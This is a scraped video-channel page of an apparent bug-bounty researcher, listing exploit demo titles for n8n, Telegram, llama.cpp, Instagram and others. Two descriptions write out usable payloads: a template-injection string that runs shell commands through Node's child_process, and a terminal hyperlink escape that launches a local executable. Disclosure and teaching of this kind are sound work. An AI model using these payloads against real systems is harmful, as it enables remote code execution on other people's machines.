NullSecurityX's banner

NullSecurityX

@NullSecurityX • 11,726 subscribers

Infosec researcher • Bug bounties & security analysis. https://t.co/kOIAd973sL Collabs/ads: DM 📥

Shorts

$Just like the classic Notepad Ctrl+Click RCE behavior, terminals on Windows, Linux, and macOS also support clickable file/URI handlers. printf "\x1b]8;;file:///C:/windows/system32/calc.exe\x07Click here\x1b]8;;\x1b\\n"$

Just like the classic Notepad Ctrl+Click RCE behavior, terminals on Windows, Linux, and macOS also support clickable file/URI handlers. printf "\x1b]8;;file:///C:/windows/system32/calc.exe\x07Click here\x1b]8;;\x1b\\n"

19,724 views

Videos

Anya Rossi

sweetdream.ai

SweetDream.ai•Sponsored•Livecam

Watch Anya Live

Anya is streaming live right now! Join her private show and enjoy exclusive content.

Exclusive private shows

1.2k viewers online

Private Show

Join now for exclusive access

Free preview available • Premium content

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

91,745 views • 1 month ago

Bypass Facebook SSL Version (latest version) Frida JS Script #Bugbounty #CyberSecurity

Bypass Facebook SSL Version (latest version) Frida JS Script #Bugbounty #CyberSecurity

50,097 views • 2 months ago

$Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}$

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}

36,718 views • 1 month ago

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

19,045 views • 1 month ago

Delete highlight cover IDOR bug in Instagram $3000 Bug Bounty PoC Write-up:

Delete highlight cover IDOR bug in Instagram $3000 Bug Bounty PoC Write-up:

21,878 views • 1 month ago

DarkForums has been hacked by NullSecurityX :) Jokes aside, we showcased the vulnerability found on Darkforums in the video. Happy hacking, everyone! 😊 Dark Web Informer #BugBounty #CyberSecurity #darkforum

DarkForums has been hacked by NullSecurityX :) Jokes aside, we showcased the vulnerability found on Darkforums in the video. Happy hacking, everyone! 😊 Dark Web Informer #BugBounty #CyberSecurity #darkforum

45,540 views • 10 months ago

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity

11,524 views • 2 months ago

No more content to load